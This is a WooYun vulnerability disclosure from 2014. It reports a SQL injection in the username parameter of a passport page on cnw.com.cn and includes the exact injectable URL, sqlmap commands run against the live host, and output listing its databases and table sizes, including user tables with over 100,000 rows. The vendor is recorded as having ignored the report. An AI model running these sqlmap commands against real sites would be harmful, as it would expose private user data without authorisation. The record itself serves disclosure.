当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054315

漏洞标题:网界网分站SQL注射(十几万用户数据)

相关厂商:网界网

漏洞作者: 超威蓝猫

提交时间:2014-03-23 17:32

修复时间:2014-05-07 17:33

公开时间:2014-05-07 17:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

网界网分站SQL注射(十几万用户数据)

详细说明:

注入点:

http://passport.cnw.com.cn/findusername.php?username=crtest1


其中,username参数存在SQL注射漏洞。

漏洞证明:

sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --dbs --current-user --current-db

01.jpg


sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --count


+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| userauditlogs                         | 264429  |
| users                                 | 128142  |
| users2                                | 127382  |
| laiyuan                               | 30618   |
| bjjt_login                            | 20666   |
| xdd_answer                            | 19526   |
| bjjt_dc                               | 14017   |
| sg_qdetial                            | 13698   |
| rel_usermail                          | 9077    |
| rel_usermail_20131206                 | 8858    |
| sg_role                               | 4055    |
| t4                                    | 2862    |
| bjjt_reg                              | 1643    |
| urlvisitrecords                       | 1332    |
| intel121112                           | 819     |
| bjjt1                                 | 649     |
| t3                                    | 275     |
| t1                                    | 184     |
| unsub_fb                              | 162     |
| sg1                                   | 138     |
| informatica                           | 101     |
| rel_othermail                         | 54      |
| sg_que                                | 45      |
| wy_industry                           | 35      |
| wy_duty                               | 20      |
| sg_roleitem                           | 18      |
| bjjtcourse                            | 15      |
| murlinfos                             | 12      |
| mailtypes                             | 10      |
| wy_companysize                        | 7       |
| wy_Turnover                           | 7       |
| sg_final_fight                        | 6       |
| wy_Pcsize                             | 6       |
| wy_serversize                         | 6       |
| bjjtcoursecate                        | 2       |
| bjjtadmin                             | 1       |
| sg_num                                | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 959     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| TABLES                                | 76      |
| STATISTICS                            | 69      |
| KEY_COLUMN_USAGE                      | 54      |
| TABLE_CONSTRAINTS                     | 54      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 30      |
| SCHEMATA                              | 4       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: ccw_passport
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| users                                 | 19      |
+---------------------------------------+---------+
Database: cnwprojects
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| answer2                               | 9665739 |
| answer                                | 32107   |
| users                                 | 3573    |
| 20090609_cisco                        | 2055    |
| 20090605_ibm                          | 867     |
| news_content                          | 461     |
| 20090424_juniper                      | 447     |
| 20090311_symantec_records             | 403     |
| 20090608_arrayamp                     | 235     |
| 20090309_symantec                     | 97      |
| question                              | 97      |
| newsletter                            | 26      |
| 20090506_novell                       | 15      |
| manswer                               | 13      |
| project                               | 12      |
| fuzeren                               | 8       |
| mquestion                             | 6       |
| meeting                               | 5       |
| musers                                | 2       |
+---------------------------------------+---------+

修复方案:

安全测试,绝未脱裤 :)

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝